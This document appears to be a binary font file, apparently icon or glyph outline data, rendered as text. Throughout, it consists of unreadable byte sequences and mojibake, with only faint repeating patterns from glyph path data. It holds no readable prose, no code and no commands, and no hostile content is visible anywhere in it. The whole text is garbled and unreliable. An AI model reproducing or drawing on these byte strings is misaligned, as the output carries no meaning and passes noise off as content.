	1"$;

		/	y
	#


-\M"","# 
+#	 		
>	
!
%F&		*	

+	

%'$%2"E#&
%%/&&uŠ
>+ˆÿõÿÑíë2AQ&'&'&"+"732767676"'&'&476762&7676.'654&È)Ve~/
dJ?„I0UxÍ*T?!oY	ý¡aTR0110RTÅUR0220RUL$ 	Jð74; ÷^AJ	.uOb•s¢Iq¨ZþQ20RUÄTR0210RTÅTS11>ΊE"D;j
&ƒAQ0è¸ ,3<Rt~‚— §!"3!2>54.32#'##'3#3#3#'73#'62"&4'632&#"327#"&4.'&54632&"#"'73264+53273##!6767676767676?%#32764&4+32OýJ)G))G)¶)G))GY$'!UE,++,Eh!"6
5i9'(7(U&(
			€$$â)G*ýÄqcYME;3*#üË

°¸)G*þ€*G))G*€*G)ÿ411|!|TT€€'9'(7&6(
		
|8[|*G)
]R	
&%è¶	9MV_hr|ƒ£&+32764+53273#7.46327&#"#"'32654&73275"&54625&#&3"264&"&462'"264&"&462'"2764&'#37#35#535#535#654'&+3533'#532l'..$2
		.  l		

		
"61$* +!©$33I33	5&&5&A  +""!"
(
‹+"DF#0Y9779Y±$
.,&M	
› HMj
1h c	

2E1	% "%	3H33H3…&6&&6R .  . S  -
6l¤¤ +$]&
 @@V11è¸Cò0!"3!2>54.6;6#&"="&'&76?>=6'&'&'"=4&/&'&+"#67&'&'&7676;2+"3?6'&'&+"=4;2+"7676&+"4;2&#&#"&/4#'#&/&+6&=4;267675'&'&+"4;2+7#"4;2+"#%6#'".74;2=4'&'&6'6+"5467>'54OýJ)G))G)¶)G))Gþö

"
%	
	â[(99J-:(H.;\T
2$0E2	)

<
+( ɦ	3&$/S.þ$3ƒ	
-0$(MVI•


¸)G*þ€*G))G*€*G)þÙ\

	'Ô
TF7$	1'<(T<xB
:u* #		

$9ZZ†
’
.5$


Q	
	èI¿ã,<%276?>;2=&+";&'32=&+"636&'&'&'&#"&767676'&63262?;6?64+";2&/&6;24+";2'&/&6;24&+"'&'&2767676?22&'&%&'&7676+"676332%2?>6767;24&#"&=4'&'&'&'&767>736%2;62'4'.8	@2"E%áþî-#6	#;),)Q8&E]D.Eq=+8-A_:N']B"VE64>&0"ý<1)B<!³!	.g¶


,	)	
 'V


ýÂ	""··P**PVM	/*&-8œcY£	{x	$&F7&B	1Haq&
	

T1DB(*!
9|	


	
~
5%

B
è¸h·è=!"3!2>54.54'5'&/4/&/&/4#&'"5'&/&/&/&/"5/&'576?2?5733&7"#'&#'4#/?6'4'4/&'4#'4/4?525?574316313&5'4'4#4/76&'2'4'6'54'6'71"/676576'4'4'5'&'5'&=4?672733OýJ)G))G)¶)G))Gþ/		e

			
 f	 	
¸)G*þ€*G))G*€*G)þ3





	
+)N	
**
!&^(B		NK
			

HQ
'	,è¸(>Gk­ù&z®·Ù!Ais}ˆ“ž©¶!"3!2>54.#"73'.5&6';&#6'5474+62"&46'6#7'&272=4#673#.654'5'4/4&/&/&/&/&/&/&/&'5656??53073+/41/7>76'4/4/0#&'5'56575253?333/4&/4'5'76&'313021'&57#09#/&/76?6/4'5'5'4'5'5./54?67327+&/&''#/&;63767>656?>'"&4626?&74+.76;#31&4&7'&7>766=&'&'&#.7676"&=423"&=46277267>&'&762+"7"#"?6+&5&54&'"&466&467;%4'&#&6."76'764'&654&676'&67&6=67;26'&3OýJ)G))G)¶)G))Gþî


b
-
ß		J	




	L
	
		¤	
	

	



S



#
&
	/
7x	

þâ	5!|{
¸)G*þ€*G))G*€*G)þ÷				

¥	
"1

!	,	5
<7
7<	

	
"&;I)^$
.$*(

	ˆ!
		%
/ 
	
"!?D
,!7
	0
	

q


	èQR¢ËÌ%Koz†²»Èú%0Ho}¢­»Ë</&5&5/4/&5'&/##21#72736?50175?6'&%4/&5&'"5/&/41/&##36?6276/4#/&/&/.5&'#/&/"5/#"1##"2223?6?54?6574747476'&35#='&275&&=46%>/&?67>'5&57"36#6'&'432632'&6'676=47#&#732#'.76762?6'&7"264&&'&7>&'&'.#/.#"732676?73>?6'264&"'>'&67#&'&623725&'&76&=4'22375'"=&7567&6'5&'&127676'&77>&'&7>372;65&'&'&#7>74&'&'&'476+"'&6456#"265'454#"265K
	
!

	
þÊj	]!
		

	þ™		



”	
‚		
	I
¼		A		&(
¨

 "4>

4
š	
"	
QM
		
,5*Q




	'5MQM$
È
+,

%& \	-	
[
\)
	0	

	4.
9h)0q+JV,	"?d…4$			

*$
þQ$
.
	-.	?$ 10	À`00	+U@ÿgÎRknÈ	k&'4/&/&/&/&/&/&/&'##767?036?476?601&/&'&/&/&/##36?6676/&'&'&5&/&/&/&/&'&'&'#''&/&/##3#36?6?#76?&634?4?656'&Æ
.#\
&+ü•&'+
!	
		


7\$	54VE

9


™/>8


!
.



çÑ

+90†Eâ+	 				

	
			r—Ôä	

TÀq
	-
		
		q
	
	8

*+1#kfaè¸A€¨¹Æ!"3!2>54.#"75472?67676754##'&'"=6?6;+"=372?2='#.'&76?363354'&'&#5476732+"=4;276&'&'#'7676.+"=4676;22;2+"56'65454;#"OýJ)G))G)¶)G))Gþ"Z!! 
Y¢X 


	
 

W£U\


QRs	  	 ¸)G*þ€*G))G*€*G)þ2xFC"þÜ…

K$þÞt			:µ



	ÿæèÕ.u²¸ÈÜ"#";23+";727654&!"#""725676762"/&'"#""3?63##&'&';27>54&!"#""767676547'325#'&;67654&39"2327>.'#"72;7>4&'&#"ãXX*4¬("
%Ä<P)7%þ¤XYE!/*)  *..'58</$)#»
,5þ£XYD0*
g(
	LAÀ6#†H""
G
!ÕC,S#
0ö+#1j%N 
2';#2	þã
E.i
%IfÌ`08>/
ÿ, -jüË:g6è¸1<GUƒ¬¸ÆÒã-8I“¹Òàì!"3!2>54.'&''&'&76762960#&/#"36:1&/#"21&'#'"3"#"#'4+"7376?6773?37325674&&'&+"62#&76?2#73?6&676?2"#3637##;27#&#&;6167#'3372?372?57##/.'#'&5'46;7015376'4'4/&/#333217+"5>723'#&#"3"#'##'#"3013013013353676'&'4#'&'#&74?3257623?4'#?6#&7>7656'&57467&76+"732676767327&7654&'&7>OýJ)G))G)¶)G))G˜;B>158s5A:—8?U.Q78þó/=V'	z'&Z		
$		@	!&L4	
	J	
	6	


S/#–	


	'
		S	T
)
!'		
¸)G*þ€*G))G*€*G)ýò 	)

h1<T7118.K-BvBEx29[ZP(-
	A#
		=
		DO
	"



	&.3
S	 
.

ÿøõ‘1BPTWZ’»ÈËÏÝðÆÈó"0;HU.'&./.767>%2;2&/&#632&/&+>>;'.#""&0400#'41"#"&?67#'#5&/+"&?63722?6763723"#75251#&767636&'"674?6?64&63271#"&7497"1&'3275&&"6767&#&"&'632?7&+'#"1"3053/4"1#'#5#01&?576372676'&/&/4'4767##3#"5#"332?673#/&'#01'#5#"4#/&?67#372?637636?3237.+&"&?>;2653'7#"76'.?426;2+"&?674;26#'.767>%"'#3>76&7&;276&2>756&%767>&ãPwC}\UÛT`
	&M¨RM$D]cªQýõ
EXt			].¸6	‡	
*	
=ŒYFn$$35j	+

	`
L

"
a
5G#˜â3			

	6

¨0 ;þ¢þô
‚+2	Ð		•BnBPGGP{WH˜	'=_­õ$		/IŒb
…(S	J%°d@!d2&"	
	bd†6æ
$	
-


		+		

e7)yV(,)#nT
3


#è¸RmŠ’¯Ëåê6>Odo!"3!2>54.&'67#"&'&/&+'.>76365676773&'>%"'#37332?374'&#"72##772367"&7670#&6;7&#"'7676&'747#7#"?2565#&76?>"&734'4'&?25765#'#676&+&"326?6763257&2767'.7'"&'&6"#"6372#"77237>&"&>7"&'#32?6?6727;7#'&#&76.6OýJ)G))G)¶)G))G¤(&N"	 K%'=<'&L 
	"J$(?þF	
1
	


 7


*	
$	8
	5
6




D
	

		¸)G*þ€*G))G*€*G)þC )	*
;QR=
 )
'"
9RSo*G00%	G#
 "		"	
8	

	,	/;	
J		ÿõóDdˆ«ÅÜ÷0H_jr{&'&#"/&'&'#67.67&'36767676;7>'&6767'#'##737657>3737"'.7>76:6=.#"76376&7'675226'&'&'&676#"723#'.?>;3#'&'&676#3?7"+67676366?&'&76'&"'.>7636""67546376&#7#'#7226#"/'&6767673#'76=.65&7&'6'&ˆ9KD‰1;
	&<7FJo:8IEŒ5;
	";5‘GKp$üÂ0	
H



	j

	


+
	


	p
B
'J

'"6+(%}$	R
V
	


ýG
ôç
85!+9P+5M<.rMKKM96-<M
$
*/P9.u›KNè.Y<ƒMAK9
&!
		 Z
	
/%	E
#D	

	
!7


%J$&Am	P	+(ŠR
.	è¸&;U€Ž·×ô-<IUa!"3!2>54.6"&/&'5&"&"&?636"&56'&'&7>2'".767676?62?63727363736"&54676327+&?64&&#5674301366767#&3276'.54676#"76'&'&76327#"'"#"&?6747326762%&#";7>&>?6&"67674"?276&3"?276&OýJ)G))G)¶)G))GýÌš
Z

!%
)7O`F1^{

[	
F		
M	

ýJ	
O

¹		
Á

S
		¸)G*þ€*G))G*€*G)ç(
	4‹
t.
#
#'V9	N3 .8
 

	%
*
	
			
ÿÿê'>Oj{‰•ÂãòBU23676'&'#&'&##"?6767676&'&";6?>3676'#"&?4;647676'&#&676?;2'&'567>7"32676&'.567>7&&6&"#15";26767676;257676&3&767>'54&'"'&6;276'&#&7>31776'5&'"'&632>'.#5>27"&756&+'&723674?676763276?6%67656'&[!	iI!
	"^þ¬ "	
&7	”	
"0ð	  *•

t
	!(
i!5$
%
	
‚	
ý6!	æ	
Is4. !$%fF™	#
'	^,$!


T	
	)) Z
!H	
n&
	<$
)
	

&	
	, 


%1
.	7

1&
4è¸2aˆ¢Ðßñ!!"3!2>54.#"#'"&?6;63+"75'.767676?254'&&7467627+"&6?6765&/&;2;76;2#"+"?6;23+"75'.7676?254'&74?67627+"?6;2&#"7327676&%&#"327674#276574!"#276574OýJ)G))G)¶)G))Gý•

$q




v
%	 
p	
c



	

?
ß
þ‡
Û	

þŠ
¸)G*þ€*G))G*€*G)þ±
}		
		

?

 637	%		%N
	!
		

-G	{

<
ÿÿéê)GW~«»çù&'&'&#";26?>;676'#".?632&'&'&+";267>32767676''"&?>;2*"5'&+";6?6?676&#&7676+#767;2?676#"&5&76?2%&'&7>#767;26?676#"&5476?2%#";26?6&ì4

),<	
	þ
*
	

;	
+gG%


#

>

þ 	 
=²(·
€6, (
M#F
&
IJp%	¯

"

PK
		O


M
I	


…ˆ¶è¸‘¹ËÔ!"3!2>54.#?'&''"'6?676'5'#5"'&''&/6?7>&'&'#&'.676767676>5367>"#"7676=&'&'&&'4#'&"36?6;2&75.3&7656'5354736&'.OýJ)G))G)¶)G))G —*" <!(J;	(;A0"*!	$"
  	-,
"Q1A(	þs
		 	
	%(,
>›!
(\r	,¸)G*þ€*G))G*€*G)þ¦(3	.*		

	
'2
/R







3	
	 

é7q€«¼Å&'&5#&.'&/&'&'&'767677674;357'&'7676=67'"'&'<'3?6'&'&>73'&"#"&'&'&'#"/.>767677676#.5&7476#476æ:&0+#D)7; &/*8C!+
03'0:(%0!EXU #5Sg8"/+S-19,ÔýÕ."
	U;(&84

!

ô8%*.%ÿŸ =
¿C  &)
)-!	;@# %F&7'!#
*
^

V

	)
$$
(+
!è¸Eapv‡•!"3!2>54.#'"'5367>'&/&'&746762&'&"37#"'&/#5747674;"#546763"+53'"&'547574?62"+5437#5437OýJ)G))G)¶)G))Gýò!
.	



	…

6/.	4R-
;+-


N++B-*¸)G*þ€*G))G*€*G)þ{(	
&1
2¥	Z$-M€		

ޤ®£è	5Ybp„Š“&'&##/5367>'&/&'&546763276?37436763;#"5&'&/##46767"+"546736?#'474767623#"57"&46í) 

5)2$?5'&
($!!_!"&=#!aVÙS2xJ*âS  SN)"

 f
J
.0¦$':.<%
-#]?þÁ+
þÁ(	TCT\.%éü""
è¸7¢¦¯¨²¸1!"3!2>54.#"&'7324&'&54632&#"727"+01#41#'01#'01#501#01'#"71#'01/81'#4'101/#51"=815#5#5'5'5&=#?3573#7"#"#530163201301#53'"&4621"10""#01###"'5372437013501309251013737350;?01373023013337#01;3?3737013503737####+"'#/#'"'#'"/"5'&'&=4743?017578657017535343503?63525736;0137323:33331201'#"'5632#>32OýJ)G))G)¶)G))Gý•	
	+
	R	

)}/);00
 /)‰N
¸		‹#¸)G*þ€*G))G*€*G)þ_#
	$

&E!!+$>G
a–—–p0Í	$!*	$G		é-$48APg624'&"3267'#"'&'3#"'56327&"'#75327654%3#7264&""'#356325&7#533275#"&=.46327&#"#"&'327654'&m2E^63)$yþÜ	
3B@I(þÐJJ% 4AJ
‘	/?	$	
«
	% (%/ 
(	)l007 A7>	2	n;#}þÆI!B<0åü  å•D:6B
83k(9
` 

6'!
		7&è¸7Et› !"3!2>54.2&'&'"#"&'&'&357676;7'#6?4;"'&?7>.'&'.76761&'&7*&/4/#"#'#676?6;2&"'3'OýJ)G))G)¶)G))Gýc.+
(†

-?…),*		

!'

­8	)+&
¸)G*þ€*G))G*€*G)þÿ."¯Z-<	š‰c'µ!!
!!
!3;&N1z ?è¿!(XiŒ ÇÒßD[m‹23267>7>;7373&5'&'.+"723#7>'&/&676?676&'&'&'2;747&+"276?#&&'.'37&'.'&#1327676766575&'"362326=#"6'5326=4#+5722'56676'."/&567>74'#&"22=46262326=6.&767'&'326'&>27"#4'4&+#33765'=226=66?'&'&67'.6'"";66=4&&4&#&";6=6'4>74&ËIb
H{œCþ© #P6	4%B<)

 +
‰@
.I}oPF	%(?!
6(H*6Ä59AGV`Úþ³,-<88
!
$H
+	u	

	ýÕ%!5Aé!	Š

$**
½

©


x
WDˆþæÁ=e;9
	

	
;


<

.¯<	Ï*."ï”@: )þˆ
›„		)	 -$O

9f7	9 "	'"'	$
&*#	

UcŽ.`	"è#Vf|‰%&'&'&#'"3267>;73&'673'&/&'&7676?676&'&'&'7>%";265&+"+&&'.';2767&'.'&#ç		$${Ib@¢Ì$
B<)

 +
# P6þÈ	?1oE	F	%(?	Lo­
6(H*6Ð,+Dˆ	þæ
dJ$=+		
	
;


<
<9º.¯;,
Ï*."ïš@: )è¸/`—¼Îæñ=Y]am{!"3!2>54.2;2656;6#"/01#%#&'01+"/4;234?6=63723?63+&=46;2+32+32'&=32756'5325'&'&6;2>&/&5676#"."7453+"+54+#"5/+"=4;23543#546327+532+;2+"73#"&'&7>'#"5'."+54;#"5'&/#+"=32353#53#53&#?>'4&"276'4OýJ)G))G)¶)G))G’	!
þE	

K64XBQ!
676Z+`!!
2-â¸)G*þ€*G))G*€*G)þù'H(*@& '--)-BEC2/	!F		
			14‘$*G++HHKF!5HX	H',J¥¥¥	^	
	è×,Kh†¨²È׿2Pfrvz"#4/5&+"#'&'5&+;2?332?"51"#'&'&+"362=47;5'%4=3;754+&5&/&+32"+#4/#;2=3;2=6&'4/&/176'4.+"32=476;5'#&=2#"&=#"76754%&327676&"/54632%&/&462636'&'&"'4+"676"#"5&5325&74+5;6=&6+"32=4&!+&4&;2'56+"=;6=4+325'32=4;2=#332"+;54%3#73#x	%'
*T,..	-F1+Š	
		;%	$/þÂ&
&?%
	!	þ´

	
+†"!$HN_ %KN°%]£&9:Ò>92
!@7
Cf<$b65h8c
*i>7e<9b)
	e <
XB	B.-	F	1C	
)
		e
iG"#Fbbe€æææÿj’R$7‚ÃÕ76767676?676#!"&5.'&/&767676736'&'&'.767>'&76767>276?67672?676'&'.?6'5.'&'&'&7&'&7>76V!Cg28TN	9)3'&üÐd
[b940046gæ- 5
	pm+$
,&dSPK	

%‹u)':F5!

	
	;Z!-..!&-	 6H$)	:
$$Û	

!7	$18f%.-PKJ?&"ý£r!

 


 $
%MQÿjžR;ƒØ%&'&'&'&/.&/&/&5476+'"#'.3!26'&2;76767676?675&'&'&7676&'&'&'&&'&/#762&76?5&'&7&7>76676'&'&/.&/.Œ

<-	V

 
W
„3òýŽ
.?
3(%
'.3	D&+
	+H93>
/"
þ»	:D"$	'&µH5
t:3a¾/$=-(:

G&
	+7()-R")"	
	
	 
	

	. E
"+R	"ÿj¤R?¡%&'&'&'&/.'&5'&/&5&76&+'&#'&'.3!26'&3676767476?676'&5676'&'&/&'&6&#'"&?7#'#?65676&?65&767676732?67632667>76?6?3?73>767'&'&'&'5.&/&'&’

!A'	W
 
:† üý¬7Z),&	
	82	

			#
#

	
"@24(2#
þ¼
f3%	''¸Þn5
v;cª-'N9 
 *#(



(<	_
.A

		

	
	



	

,4

!(#>-(&
ÿj•R‘ã 3>76?6767654676?675&'&'&5'4?6/&'4'"'5&6'&&/&#'&'&'"75&5&7&6?"//&;26;673636'&5&?6?676762;274?46'&'&'&/.&/&'&4&'&/&'&&5'&/&5476+'"#&5.3!26'&%#)
	

	



		5

$6-*$'		O
!,XT	


V	"âÒ"$#	

	<7	
	
	

& &&)	$
-$5
þB!"þÆ
4E#$	&%h4@3r9bÿj¡S4i¥.'&/&#'&'&76&+"#4'.3!26767676?67676'.#.76'4'&'&/###'4>'&7476767637676'&'&'&'&ž …
:
A
X
… ôý™$)>Q0*
	)^08,B
	
	
	
	@j."
^.0cu;
5Ün·''		''¶J5
;uH$7	,!&!	2"<&F)G$5-#o
-+@',	
*
.(+$=	ÿ¥ÌEN&'.'.#&"6?;3265&=36=326'4?>>.È2TT<&A10BÖ,+?,-N € ,@(PS¹þ¿Í@€ÎÌC>|<-?,-@-ÿj”T"0?Q`p€ ±ÀÔäö&eÉä%&'&'.'&'&'&'&!265&=&747#"#"&=4'?7"#&5654'&?677'#56546'"&56546.56'546'&=467+"&=4'46'#"&=476'#"&=463+&=462'#"&56'546'&7546'&75467&#=65"#"&=776?67676'&56'76&'&#"&'&'&"767667>'&767676376?67676766?#67656'&&'&'&'&'&'&623767627326'&'&'&“P2+8QU50J8;"6üç	3
)6

230123230	
/

2	'ý=KQQh%0! .,J45U)
"	
#29	
!#	)s
& 	"N	¢

	0 
=
/$ '%"C25"	)7‹	t:	hE#	>{	
ê´-~
P¡
Z†W°þó8§	ôç	0`KkH$f66Øg9:àM}ð-»<±		þ÷ú		'›'æ
.\E	Ë=Q2¡yhG'O.0%g=,.	5p": <%,$!($/'

	

	




"p


,Q	
3©	ÿjé\*e|6'&'&/&'&/"'&'&'47#3!7674/&'&67276767727676'&'&'&'&'.3276764&ç
,&.R3b
`5_„,	Ýý!B'=
9(*B9!H%/+[.095P1; /%
&	#
K?1 #



zFD|$* )%4TàHl "4
;
dA3:qng7"QayYG		ÿjå[,Q4'&'&/&/"'&'.7"3!&'&76776?67>&'&'&å,"Jl3a
a3	5G#C+Ùý†/N13@;+0&*P‚„[z9T51 # yEEz0 )$5Sñ,B8=6#sa;+/|€4b	Yz Vÿ¨€)4?264&"!264&"%2>4.""34.347&#"%"!4.ñ%54K44þ+%44J54"$=#$<H<$#=!œ&BýPœ'B&Œ8_8ž8_®4K45J44J55J4]#=H=$$=H=#€48þâ'A&Žþþ48&AÄ8_8þq8_8	ÿe¡i?v½ÆÏØáô6766&75&'&'&76767676'&'&?6/&'&7>'&76?>7676#&'&'4#&'&7>&'&'&/&'&'.56'5"&'&=4'&'76767>=6"&462'"&46264.#2>.676?6&'&'&1~s@9!‘@FFV!'#3|ƒ	1:.%#eJ3


k
7#&&	& 5,B91?L?Qej‡e,þWBœ
*
ª(5$(6TþèF$) W/
6*7?	@d 
			cB#

þ&(	!(

	
89
	(
iaÅc
ÿe¦RB{ÁÊÓÜåø76767676'&=67476764'&'63&'&'676?&67#&'&77>5&?>7676##&'&'4'&'&5>&'.'&/&'&'&="&'&=4'&'767676<"&462'"&462>.#2>.27676&'&'&?AFGV#(%	
	]d-&!!	 


1;5"gK4

s*!" ,	' 6-!A1
@M@Rfk‰f*þNGŸ+!
˜E((Y/*$
 
	0
)E7@		AeA%

"	cC#

þ!(			
0
'


	
89
	)
/mbÊd	
ÿ¼ªl™%"+""'&/&+"!54'.701&'476'&'.'&'&'."'&'&'&137671676?73>5'"/&'&/#"&5476736767632š
""
>@\@ò	
,2'Z`Z'0,
	
J/%&<FNMH>#%/JÆ
7?FF?7
%.*:,

,9*,$	¥	%11%	!!nn!!|%,$"7	>/#%%#-@	7"$,%%B*22-?%f;)00);
ÿj±Y;|¼Ø%&'&/&'&'&/&/&5476&+&#'.3!26/&7676?63276?676'&&767'&'&'&/&'&'&#"74>26>'&6;276'.'4&'&'&'56546;227>7'&'&54763>&6276%01627>&'&1/&#7676&'&+"'#&'&+"&6ž

CJ	%4J
[

Š"
ý‰5=*&6!	
":$0}:G

	0
&"E!+a1%
!	þô-$4+!
	EG( A0		G		
O8#	ÁEB ' 
)'¼V
	6 ¶S¼+%,
#4S
;A_
&":
5=	



!n9%,*#(5
	Ü$


%+!%Sÿ½«þ!?`mv%4'4&#&"73726=763>&75#&676'&4&'&;2>=767676%2674."26.%264&É"––""#F".$	
(#þ1*@!3
 #4.Q¬#G,%%5"!
.þJ.?3<4@Ó&78M57*'57L8+ù~>""cc":IH#$.š#@LPP1$F"!2"¤'-5
!#t.QË@.45.? 8L87N77N78%+ÿ¨m	DP%!7'&/!&'326=4&'>73;26=4&'&'./%6 2676L‚%

_eÄ
&?d_
ý`%
‹uuŠ

%I&kBBk&I3þ' i„j^<‡c™<4c‡e
|
gssg
|

|sH%,,%Hs|
ææfLJOOJLÿfßR'4!454/&'4767636'&'&54>2".[ 8,E4)-LKZ+!$C-MZM--MZM-87=
	|X,<ß

.L--MZL--LÿicS"0"&'.767627>7>".4>O…=G1œ	,-		A´#-#<(,)E4Y55Xh[85Z– ")lV¶t	
/0M
rÚD2* b6[gY54Y46[6ÿûÿ…ë88"#&"&'&7676767676'&/&7>'ó5kÔj'C E&*#e(
Ge;KmJr&3%-!
	z	F3)%%™¦9X.IE®·'

!'"-ÿj„Rd%&'&'&/.767>7676'&'"&57676./#"7623767>76'&F 

(T7	+	5M$		"4 

/%wJ
±pD:!!
Ž


7 .&0
7cCDa7

	+/(
!LC0
'#=D$ÿjÇR'/%&'&'&"!265&26764'."7'&'«@œWnx\B0h›þ0M&&'%‚™B@K'&ú'%,c.$(¯XIM&4o›)USM@B™B?L'%ƒ™B?L¯+.ÿi¥[!&'&767>#!&"&'76iJ-1ƒ0-ElGyýǒI
ҍ7LDFA,2"$2/ADBJ6,a¥á.¯ÿnèO(%&'&"'&"!265&2>&'.#"ÉC§]v€bF4qÜþ
N‚K'&IMII>?»^NS(8z£,![OJšA>GKMI}%&ÿj±R+%/43732=#&'&'#'##;33!26=4‘Ö[v"h7F F5j yþÊ Ðf+ X½l=;n½X Ž,ó##ó,ÿi¬[X!"'&=6'&7676?6?4'&'.'&'.'&7>'&7>7276'#'ôþ›&0'@/[/

K-%*q
	2cN5 ."7:!9t•	('5;*!+90@+190C'm
&

72	
0)8R(&ÿÿÿyêD
!3K".54>2""&767676#!"#"&7>#%&/.'&6767>1ô@i>@j|j>>kþ¸F
Ž&DKf
Aii´Ä.

þ"
 
&
!>	):2t?l@<j>?k}i?þ	Ý -+	½ü

À‚þÿ</O`
0 )	>~ÿggS%2&'"'767>'456'.'>4."ž
GªF:_9
*5:QOaXhW

3Yá:b:9ave<<e†,-
Kj:>S)
	

	:U+;gJ+;cuc:9cuf;ÿf–R*S`…˜®!474/&5&'&'4767636'&'&56/'&'&=4/&5'&'&676?24>2".45476?65767463'&'&5.'&676'.76'&'&676 \
8,E4).MJZ+@$B! <
G9&-L[L--MZL-,&#
<AA#$þ”3R%\H
01p 9"4):	&P9J%=’I

	|„<ß

2R[¾<y"D7d"B&.L--MZL--Lý£('
›,X
ß4¾	
>uc7.2Y	‰!:$ CU":)ÿþÿŸê#!.Mq€‘&'.7676276?>".4>7276?>&'&/.767%'&'.'&76762767'.56'.764>.Bn2;)	
>#
	•	&2!F9+J,,IVL-+K	
‰-'7	Ž	
þto%'!,^	/	
íQB65M5&ý´2PN2	(L0`!ZG™^	A		)$	_µ9($

ú,KVJ,+JXK,Y
!Y¥,#	«h!
Z…
1"&rG	1

>‘>;	M=
=|)C"
8N
	
Aÿýí6`ˆ%"#&"&'&767676?676'&/&7>'##7"#"'&'&/.76'&'&67>#%+"&5&7>767>/&'&7>ó!C„C*+	

@T8/D/H/!!$Gà""#-FD.!P"$&D"
+ý’+!2
;)'
%'CL>7/, 	
_i7A.+lt
!;X$]kM7*dc

	"8‹	3"%

_K"%ImXCÿþÿêèØMœ%&'&'4'&767632?6'.75656'&'&#23!>754'&&'&/&'&54&676?>'&'<'4'&'"&'&'&;27>5,4P&T
!7
##8.$
ß,*"—D!86))	K
	/?
ß$ç&
&)2R
4%)&0/#	 +'[+a 	
		19/!&	B0

".&'è´X©ó%&/&'.76742?6.?676.'"/#+3223767>76'&%6?67'&'.767632?6'.&7654.'&2265&?676&'&'&'.7>767676&'&'&/&'.62;>7435æ1		9%7<	
	
"	!,=yL1%þ"8%0
#,
$H(à
	
 
	
2>7
.	#	>=Ð
%!1	
%D.
Y9	
	

#
6+ 	-+-	 '2:% 	1!	"
	
( &"%
 
"$
ÿüÿÎì÷Cc&'&767>#!"&'&76%&'&>#&"&'&'.76'&67&7>76#&"&'&767676€/SR	
,C.Kþ†@;<ga&{	}~)G3	þ\
A/\99'*U	LM
'*=)#0*,* )+)/">gÀnÈ-?5W-1.\ <œ/+S*;IuIe.7J!72l%\|		@>C28
ÿ˜è#5O\o†™ª¶Ë%./&#"'76765<%6?.'#&6'&%&'&"#767>5'4'&2>4."'2?67>7'.%&'&#7675&'&'3>76.'&>5.'&6767&632'326767654&'#&#"a;/(Z'0A#,-?:G:þž!)6'IU
($,,8I=þ{ 55@7 !7­	$&60>D
'6)!
NTIÐ
	2D36&$þþ#,%E+=/)I
Mc %%9;-#;"";70K

O0A!	
Nœ	66P>	e¤6;S
	
	/0L2 6?6 6?7 y%>	.E-1AP68g	>P6AA14#.	>E*
<&.B6'#<.G	";F;#ÿ¾èÿ 9S`t…&/"'767>5<'.%6?.'#&65&%&'&'&#767>5'4%2>4."'2767>7'.%3>54&'&p/s0'@&
+78OGYH		Iþ”"*3E/

`d
	V!-71"D	[K	þ'C''BOD))DÖ
-%0C#'?"(Dé-V5K;"B/+6-	3H'Q)
	

`=\C&%
*7FM
~9`3&C"Gi
;;=(DNC('COD(—.N$9+B$(A&
 L/9Q8"Vÿ¨ª:X]aŒ"32>4.'&'&/?676?6;6?676'"2?6767654'&'&53&537.'&'"'&'..547676254ô(B(%!#*'D((C
		

$0wfc9<-4L
XÄWK4-;:cfþ²ˆ~,&)1
*VŒEU$&97_aâa_79&$Ž'CMD(CPD'þ”
		á<:cfwLFE9B+
)*+C9DFLwfc:<üäw‡
	‡w¥,QT¦0	hE&3yAqa_7997_aqAy3ÿjÇR‘æ;SŽ376?67675676?675'&'&5&?6'&'&#&'&76#&'5.'&'&'"=&'47&6?&//&"732?673673765'&?676?6367>;265746'"'&'&/.&/&'&5654&/.?67016&#>=4&'.'2"?676/&'&?737>76'&#&&&'&'&/&/"'&'&'&753!26=4'&%
%	)


		
	

2!4	
$6.)$&		©		)	
=	
J

Ú

"'KZ/\
Y2_$#		–Ò	! #

<8
	
		.
* !&
"	
%


-#6þ–+"


		[)r@?s

)%-
)"ÿjÊR3±×äí6?676767>732767676'5&75!"&56'3'&'.'&'1&"'&'743676756/&7672'5&567676767"'&76'&276?67676'&'&'54&#"63>767676676&'#&'&'2764'&"#264&"	&Bd/\
]/P*#)	ü`î
0%D	
+1#.( #%.K&/E%	*&F
H%%
.Y-X.

O0'	D	D\58
E0eCb <­%%7"">&#!qBBq!.=D$ª2_+:&=)+	

.Q"+65%M2/þj$
	+
b66a	'&- 
K&

1"P
üÿpéL(@%.7654'&'&"3276762?64'#"'&'&476762 E;:bdìeb:;;:bevDA?6ž	@þÕ,n<ZML,--,LM´MK,-$’k€veb:;;:beìeb:;&ž@&)-,LM´ML,--,LMZ8gÿjèR2<%'2644'&'&"27676"'&'&47676234>35"Íæ3QåM7ú32UWÌWU2332UWÌWU23þ‰LB?&&&&?B˜B?&&&&?BþÙ?*H*<d;
æQ4æ7MífWU2332UWÌWU2332UW³&&?B˜B?&&&&?B˜B?&&*H*?;dÿiáR(9IT_jŽ%.7654'&'&"327632?64/#".4>254&#!"3!26#";6#";6;&5#""&5463!24&#!"3!&'d+'&AC›CA&''&ACNXGb ÀH(;e;;dwe;þ¸þ´L‹Ê†E\HWHAk¶	5*
ý„"DQNCA&''&ACœBA&'1b!¤	;ewd;;e;H±00F/%k.j/%ð&<0
e(ü‹ÿúðÂ/@R%.7654."32762?64/#".4>2%467!"3!..#!"&/.+"!Š#>j|j=>i>H:Q
œ	2@/Q//Q_Q/þA>6þ"
ðBPLþæ*

*‡¾8B>i>>i|j>)Q…
*/Q`P//Q/<5Ds$þ‹	!ƒ

lÿqèL'?f|–®%.7654'&'&"3276762?64'#"'&'&476762'676/&76/&'&'&267676'<63676#".4?#'.;26?6'&?&#;26=4&'!F;:beìeb:;;:bevDA?6ž>þÖ,n<ZML,--,LM´MK,-$¾#		+2,¼9(&>!%/
h	j!	h

/%’lveb:;;:beìeb:;&ž
>&)-,LM´MK,--,KMZ8gé	*
)		  3	 '#6‘9$?	
FCE
	?$9ÿÈéõ/q%.7654."32762?64/#".4>2%46>=46?636=4&"/&"?626/./.&546?6€#@mm@@m@I<Q
¡3C1S11ScS1ýÎ	ÞÐúúúú‘f	)ÐÐ	a9DAm@@nm@)R
‰+1SdS11T19q
A6
iµ
ï~~~
ý·~I3
i
iýï
ÿpéL(@X|%.7654'&'&"3276762?64'#"'&'&476762%?626=4&/&";26=46;2;26=4&/&" E;:bdìeb:;;:bevDA?6ž	@þÕ,n<ZML,--,LM´MK,-$ýáØØ		ØØ=U
UU	šš	’k€veb:;;:beìeb:;&ž@&)-,LM´ML,--,LMZ8gÒ(§§(¨¨N“
UU
